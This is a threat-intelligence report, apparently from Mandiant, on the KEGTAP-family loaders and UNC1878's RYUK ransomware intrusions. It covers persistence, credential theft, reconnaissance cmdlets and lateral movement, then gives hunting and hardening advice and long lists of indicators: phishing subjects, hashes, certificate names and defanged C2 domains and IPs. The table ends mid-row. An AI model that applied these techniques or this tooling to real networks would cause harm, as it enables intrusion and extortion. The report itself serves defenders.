  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s

  • KEGTAP
    • df00d1192451268c31c1f8568d1ff472
  • BEERBOT
    • 6c6a2bfa5846fab374b2b97e65095ec9
  • SINGLEMALT
    • 37aa5690094cb6d638d0f13851be4246
  • STILLBOT
    • 3176c4a2755ae00f4fffe079608c7b25
  • WINEKEY
    • 9301564bdd572b0773f105287d8837c4
  • CORKBOT
    • 0796f1c1ea0a142fc1eb7109a44c86cb

Code Signing Certificate CNs

  • ARTBUD RADOM SP Z O O
  • BESPOKE SOFTWARE SOLUTIONS LIMITED
  • Best Fud, OOO
  • BlueMarble GmbH
  • CHOO FSP, LLC
  • Company Megacom SP Z O O
  • ESTELLA, OOO
  • EXON RENTAL SP Z O O
  • Geksan LLC
  • GLOBAL PARK HORIZON SP Z O O
  • Infinite Programming Limited
  • James LTH d.o.o.
  • Logika OOO
  • MADAS d.o.o.
  • MUSTER PLUS SP Z O O
  • NEEDCODE SP Z O O
  • Nordkod LLC
  • NOSOV SP Z O O
  • OOO MEP
  • PLAN CORP PTY LTD
  • REGION TOURISM LLC
  • RESURS-RM OOO
  • Retalit LLC
  • Rumikon LLC
  • SNAB-RESURS, OOO
  • TARAT d.o.o.
  • TES LOGISTIKA d.o.o.
  • VAS CO PTY LTD
  • VB CORPORATE PTY. LTD.
  • VITA-DE d.o.o.

UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s

First Seen

Domain

12/11/19

updatemanagir[.]us

12/20/19

cmdupdatewin[.]com

12/26/19

scrservallinst[.]info

1/10/20

winsystemupdate[.]com

1/11/20

jomamba[.]best

1/13/20

updatewinlsass[.]com

1/16/20

winsysteminfo[.]com

1/20/20

livecheckpointsrs[.]com

1/21/20

ciscocheckapi[.]com

1/28/20

timesshifts[.]com

1/29/20

cylenceprotect[.]com

1/30/20

sophosdefence[.]com

1/30/20

taskshedulewin[.]com

1/30/20

windefenceinfo[.]com

1/30/20

lsasswininfo[.]com

1/30/20

update-wind[.]com

1/30/20

lsassupdate[.]com

1/30/20

renovatesystem[.]com

1/31/20

updatewinsoftr[.]com

2/2/20

cleardefencewin[.]com

2/2/20

checkwinupdate[.]com

2/2/20

havesetup[.]net

2/3/20

update-wins[.]com

2/3/20

conhostservice[.]com

2/4/20

microsoftupdateswin[.]com

2/4/20

iexploreservice[.]com

2/12/20

avrenew[.]com

2/12/20

target-support[.]online

2/12/20

web-analysis[.]live

2/14/20

freeallsafe[.]com

2/17/20

windefens[.]com

2/17/20

defenswin[.]com

2/17/20

easytus[.]com

2/17/20

greattus[.]com

2/17/20

livetus[.]com

2/17/20

comssite[.]com

2/17/20

findtus[.]com

2/17/20

bigtus[.]com

2/17/20

aaatus[.]com

2/17/20

besttus[.]com

2/17/20

firsttus[.]com

2/17/20

worldtus[.]com

2/26/20

freeoldsafe[.]com

2/26/20

serviceupdates[.]net

2/26/20

topserviceupdater[.]com

2/27/20

myserviceupdater[.]com

2/29/20

myservicebooster[.]net

2/29/20

servicesbooster[.]org

2/29/20

brainschampions[.]com

2/29/20

myservicebooster[.]com

2/29/20

topservicesbooster[.]com

2/29/20

servicesbooster[.]com

2/29/20

topservicesecurity[.]org

2/29/20

topservicesecurity[.]net

2/29/20

topsecurityservice[.]net

2/29/20

myyserviceupdater[.]com

2/29/20

topservicesupdate[.]com

2/29/20

topservicesecurity[.]com

2/29/20

servicesecurity[.]org

2/29/20

myserviceconnect[.]net

3/2/20

topservicesupdates[.]com

3/2/20

yoursuperservice[.]com

3/2/20

topservicehelper[.]com

3/2/20

serviceuphelper[.]com

3/2/20

serviceshelpers[.]com

3/2/20

boostsecuritys[.]com

3/3/20

hakunamatatata[.]com

3/8/20

service-updater[.]com

3/9/20

secondserviceupdater[.]com

3/9/20

twelvethserviceupdater[.]com

3/9/20

twentiethservicehelper[.]com

3/9/20

twelfthservicehelper[.]com

3/9/20

tenthservicehelper[.]com

3/9/20

thirdserviceupdater[.]com

3/9/20

thirdservicehelper[.]com

3/9/20

tenthserviceupdater[.]com

3/9/20

thirteenthservicehelper[.]com

3/9/20

seventeenthservicehelper[.]com

3/9/20

sixteenthservicehelper[.]com

3/9/20

sixthservicehelper[.]com

3/9/20

seventhservicehelper[.]com

3/9/20

seventhserviceupdater[.]com

3/9/20

sixthserviceupdater[.]com

3/9/20

secondservicehelper[.]com

3/9/20

ninthservicehelper[.]com

3/9/20

ninethserviceupdater[.]com

3/9/20

fourteenthservicehelper[.]com

3/9/20

fourthserviceupdater[.]com

3/9/20

firstserviceupdater[.]com

3/9/20

firstservisehelper[.]com

3/9/20

fifthserviceupdater[.]com

3/9/20

eleventhserviceupdater[.]com

3/9/20

fifthservicehelper[.]com

3/9/20

fourservicehelper[.]com

3/9/20

eighthservicehelper[.]com

3/9/20

eighteenthservicehelper[.]com

3/9/20

eighthserviceupdater[.]com

3/9/20

fifteenthservicehelper[.]com

3/9/20

nineteenthservicehelper[.]com

3/9/20

eleventhservicehelper[.]com

3/14/20

thirdservice-developer[.]com

3/14/20

fifthservice-developer[.]com

3/15/20

firstservice-developer[.]com

3/16/20

fourthservice-developer[.]com

3/16/20

ninethservice-developer[.]com

3/16/20

seventhservice-developer[.]com

3/16/20

secondservice-developer[.]com

3/16/20

sixthservice-developer[.]com

3/16/20

tenthservice-developer[.]com

3/16/20

eithtservice-developer[.]com

3/17/20

servicedupdater[.]com

3/17/20

service-updateer[.]com

3/19/20

sexyservicee[.]com

3/19/20

serviceboostnumberone[.]com

3/19/20

servicedbooster[.]com

3/19/20

service-hunter[.]com

3/19/20

servicedhunter[.]com

3/19/20

servicedpower[.]com

3/19/20

sexycservice[.]com

3/23/20

yourserviceupdater[.]com

3/23/20

top-serviceupdater[.]com

3/23/20

top-servicebooster[.]com

3/23/20

serviceshelps[.]com

3/23/20

servicemonsterr[.]com

3/23/20

servicehunterr[.]com

3/23/20

service-helpes[.]com

3/23/20

servicecheckerr[.]com

3/23/20

newservicehelper[.]com

3/23/20

huntersservice[.]com

3/23/20

helpforyourservice[.]com

3/23/20

boostyourservice[.]com

3/26/20

developmasters[.]com

3/26/20

actionshunter[.]com

5/4/20

info-develop[.]com

5/4/20

ayechecker[.]com

5/4/20

service-booster[.]com

9/18/20

zapored[.]com

9/22/20

gtrsqer[.]com

9/22/20

chalengges[.]com

9/22/20

caonimas[.]com

9/22/20

hakunaman[.]com

9/22/20

getinformationss[.]com

9/22/20

nomadfunclub[.]com

9/22/20

harddagger[.]com

9/22/20

errvghu[.]com

9/22/20

reginds[.]com

9/22/20

gameleaderr[.]com

9/22/20

razorses[.]com

9/22/20

vnuret[.]com

9/22/20

regbed[.]com

9/22/20

bouths[.]com

9/23/20

ayiyas[.]com

9/23/20

serviceswork[.]net

9/23/20

moonshardd[.]com

9/23/20

hurrypotter[.]com

9/23/20

biliyilish[.]com

9/23/20

blackhoall[.]com

9/23/20

checkhunterr[.]com

9/23/20

daggerclip[.]com

9/23/20

check4list[.]com

9/24/20

chainnss[.]com

9/29/20

hungrrybaby[.]com

9/30/20

martahzz[.]com

10/1/20

jonsonsbabyy[.]com

10/1/20

wondergodst[.]com

10/1/20

zetrexx[.]com

10/1/20

tiancaii[.]com

10/1/20

cantliee[.]com

10/1/20

realgamess[.]com

10/1/20

maybebaybe[.]com

10/1/20

saynoforbubble[.]com

10/1/20

chekingking[.]com

10/1/20

rapirasa[.]com

10/1/20

raidbossa[.]com

10/1/20

mountasd[.]com

10/1/20

puckhunterrr[.]com

10/1/20

pudgeee[.]com

10/1/20

loockfinderrs[.]com

10/1/20

lindasak[.]com

10/1/20

bithunterr[.]com

10/1/20

voiddas[.]com

10/1/20

sibalsakie[.]com

10/1/20

giveasees[.]com

10/1/20

shabihere[.]com

10/1/20

tarhungangster[.]com

10/1/20

imagodd[.]com

10/1/20

raaidboss[.]com

10/1/20

sunofgodd[.]com

10/1/20

rulemonster[.]com

10/1/20

loxliver[.]com

10/1/20

servicegungster[.]com

10/1/20

kungfupandasa[.]com

10/2/20

check1domains[.]com

10/5/20

sweetmonsterr[.]com

10/5/20

qascker[.]com

10/7/20

remotessa[.]com

10/7/20

cheapshhot[.]com

10/7/20

havemosts[.]com

10/7/20

unlockwsa[.]com

10/7/20

sobcase[.]com

10/7/20

zhameharden[.]com

10/7/20

mixunderax[.]com

10/7/20

bugsbunnyy[.]com

10/7/20

fastbloodhunter[.]com

10/7/20

serviceboosterr[.]com

10/7/20

servicewikii[.]com

10/7/20

secondlivve[.]com

10/7/20

quwasd[.]com

10/7/20

luckyhunterrs[.]com

10/7/20

wodemayaa[.]com

10/7/20

hybriqdjs[.]com

10/7/20

gunsdrag[.]com

10/7/20

gungameon[.]com

10/7/20

servicemount[.]com

10/7/20

servicesupdater[.]com

10/7/20

service-boosterr[.]com

10/7/20

serviceupdatter[.]com

10/7/20

dotmaingame[.]com

10/12/20

backup1service[.]com

10/13/20

bakcup-monster[.]com

10/13/20

bakcup-checker[.]com

10/13/20

backup-simple[.]com

10/13/20

backup-leader[.]com

10/13/20

backup-helper[.]com

10/13/20

service-checker[.]com

10/13/20

nasmastrservice[.]com

10/14/20

service-leader[.]com

10/14/20

nas-simple-helper[.]com

10/14/20

nas-leader[.]com

10/14/20

boost-servicess[.]com

10/14/20

elephantdrrive[.]com

10/15/20

service-hellper[.]com

10/16/20

top-backuphelper[.]com

10/16/20

best-nas[.]com

10/16/20

top-backupservice[.]com

10/16/20

bestservicehelper[.]com

10/16/20

backupnas1[.]com

10/16/20

backupmastter[.]com

10/16/20

best-backup[.]com

10/17/20

viewdrivers[.]com

10/19/20

topservicebooster[.]com

10/19/20

topservice-masters[.]com

10/19/20

topbackupintheworld[.]com

10/19/20

topbackup-helper[.]com

10/19/20

simple-backupbooster[.]com

10/19/20

top3-services[.]com

10/19/20

backup1services[.]com

10/21/20

backupmaster-service[.]com

10/21/20

backupmasterservice[.]com

10/21/20

service1updater[.]com

10/21/20

driverdwl[.]com

10/21/20

backup1master[.]com

10/21/20

boost-yourservice[.]com

10/21/20

checktodrivers[.]com

10/21/20

backup1helper[.]com

10/21/20

driver1updater[.]com

10/21/20

driver1master[.]com

10/23/20

view-backup[.]com

10/23/20

top3servicebooster[.]com

10/23/20

servicereader[.]com

10/23/20

servicehel[.]com

10/23/20

driver-boosters[.]com

10/23/20

service1update[.]com

10/23/20

service-hel[.]com

10/23/20

driver1downloads[.]com

10/23/20

service1view[.]com

10/23/20

backups1helper[.]com

10/25/20

idriveview[.]com

10/26/20

debug-service[.]com

10/26/20

idrivedwn[.]com

10/28/20

driverjumper[.]com

10/28/20

service1boost[.]com

10/28/20

idriveupdate[.]com

10/28/20

idrivehepler[.]com

10/28/20

idrivefinder[.]com

10/28/20

idrivecheck[.]com

10/28/20

idrivedownload[.]com

 

First Seen

Server

Subject

MD5

12/12/19

140.82.60.155:443

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

12/21/19

96.30.192.141:443

CN=cmdupdatewin[.]com

3d4de17df25412bb714fda069f6eb27e

1/6/20

45.76.49.78:443

CN=scrservallinst[.]info

cd6035bd51a44b597c1e181576dd44d9

1/8/20

149.248.58.11:443

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/9/20

96.30.193.57:443

CN=winsystemupdate[.]com

e4e732502b9658ea3380847c60b9e0fe

1/14/20

95.179.219.169:443

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

1/16/20

140.82.27.146:443

CN=winsysteminfo[.]com

29e656ba9d5d38a0c17a4f0dd855b37e

1/19/20

45.32.170.9:443

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/20/20

207.148.8.61:443

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/28/20

209.222.108.106:443

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

1/29/20

31.7.59.141:443

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

1/29/20

79.124.60.117:443

C=US

9722acc9740d831317dd8c1f20d8cfbe

1/29/20

66.42.86.61:443

CN=lsassupdate[.]com

3c9b3f1e12473a0fd28dc37071168870

1/29/20

45.76.20.140:443

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/29/20

45.76.20.140:80

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/30/20

149.248.5.240:443

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

144.202.12.197:80

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.248.5.240:80

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

149.28.246.25:80

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

144.202.12.197:443

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.28.246.25:443

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

45.77.119.212:443

CN=taskshedulewin[.]com

e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

45.77.119.212:80

CN=taskshedulewin[.]com

e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

149.28.122.130:443

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

45.32.170.9:80

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/30/20

149.248.58.11:80

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/30/20

149.28.122.130:80

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

207.148.8.61:80

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/31/20

81.17.25.210:443

CN=update-wind[.]com

877bf6c685b68e6ddf23a4db3789fcaa

1/31/20

31.7.59.141:80

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

2/2/20

155.138.214.247:80

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

155.138.214.247:443

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

45.76.231.195:443

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/2/20

45.76.231.195:80

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/3/20

46.19.142.154:443

CN=havesetup[.]net

cd354c309f3229aff59751e329d8243a

2/3/20

95.179.219.169:80

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

2/3/20

140.82.60.155:80

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

2/3/20

209.222.108.106:80

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

2/3/20

66.42.118.123:443

CN=conhostservice[.]com

6c21d3c5f6e8601e92ae167a7cff721c

2/4/20

80.240.18.106:443

CN=microsoftupdateswin[.]com

27cae092ad6fca89cd1b05ef1bb73e62

2/4/20

95.179.215.228:443

CN=iexploreservice[.]com

26010bebe046b3a33bacd805c2617610

2/12/20

155.138.216.133:443

CN=defenswin[.]com

e5005ae0771fcc165772a154b7937e89

2/12/20

45.32.130.5:443

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

2/14/20

45.76.167.35:443

CN=freeallsafe[.]com

85f743a071a1d0b74d8e8322fecf832b

2/14/20

45.63.95.187:443

CN=easytus[.]com

17de38c58e04242ee56a9f3a94e6fd53

2/17/20

45.77.89.31:443

CN=besttus[.]com

2bda8217bdb05642c995401af3b5c1f3

2/17/20

95.179.147.215:443

CN=windefens[.]com

57725c8db6b98a3361e0d905a697f9f8

2/17/20

155.138.216.133:443

CN=defenswin[.]com

c07774a256fc19036f5c8c60ba418cbf

2/17/20

104.238.190.126:443

CN=aaatus[.]com

4039af00ce7a5287a3e564918edb77cf

2/17/20

144.202.83.4:443

CN=greattus[.]com

7f0fa9a608090634b42f5f17b8cecff0

2/17/20

104.156.245.0:443

CN=comssite[.]com

f5bb98fafe428be6a8765e98683ab115

2/17/20

45.32.30.162:443

CN=bigtus[.]com

698fc23ae111381183d0b92fe343b28b

2/17/20

108.61.242.184:443

CN=livetus[.]com

8bedba70f882c45f968c2d99b00a708a

2/17/20

207.148.15.31:443

CN=findtus[.]com

15f07ca2f533f0954bbbc8d4c64f3262

2/17/20

149.28.15.247:443

CN=firsttus[.]com

88e8551f4364fc647dbf00796536a4c7

2/21/20

155.138.136.182:443

CN=worldtus[.]com

b31f38b2ccbbebf4018fe5665173a409

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/26/20

108.61.72.29:443

CN=myserviceconnect[.]net

9f551008f6dcaf8e6fe363caa11a1aed

2/27/20

216.155.157.249:443

CN=myserviceupdater[.]com

4c6a2c06f1e1d15d6be8c81172d1c50c

2/28/20

45.77.98.157:443

CN=topservicesbooster[.]com

ba4b34962390893852e5cc7fa7c75ba2

2/28/20

104.156.250.132:443

CN=myservicebooster[.]com

89be5670d19608b2c8e261f6301620e1

2/28/20

149.28.50.31:443

CN=topsecurityservice[.]net

77e2878842ab26beaa3ff24a5b64f09b

2/28/20

149.28.55.197:443

CN=myyserviceupdater[.]com

0dd8fde668ff8a301390eef1ad2f9b83

2/28/20

207.246.67.70:443

CN=servicesecurity[.]org

c88098f9a92d7256425f782440971497

2/28/20

63.209.33.131:443

CN=serviceupdates[.]net

16e86a9be2bdf0ddc896bc48fcdbb632

2/29/20

45.77.206.105:443

CN=myservicebooster[.]net

6e09bb541b29be7b89427f9227c30a32

2/29/20

140.82.5.67:443

CN=servicesbooster[.]org

42d2d09d08f60782dc4cded98d7984ed

2/29/20

108.61.209.123:443

CN=brainschampions[.]com

241ab042cdcb29df0a5c4f853f23dd31

2/29/20

104.156.227.250:443

CN=servicesbooster[.]com

f45f9296ff2a6489a4f39cd79c7f5169

2/29/20

140.82.10.222:443

CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

2/29/20

149.28.35.35:443

CN=topservicesecurity[.]org

82bd8a2b743c7cc3f3820e386368951d

2/29/20

207.148.21.17:443

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

2/29/20

45.77.153.72:443

CN=topservicesupdate[.]com

8330c3fa8ca31a76dc8d7818fd378794

3/1/20

140.82.10.222:80

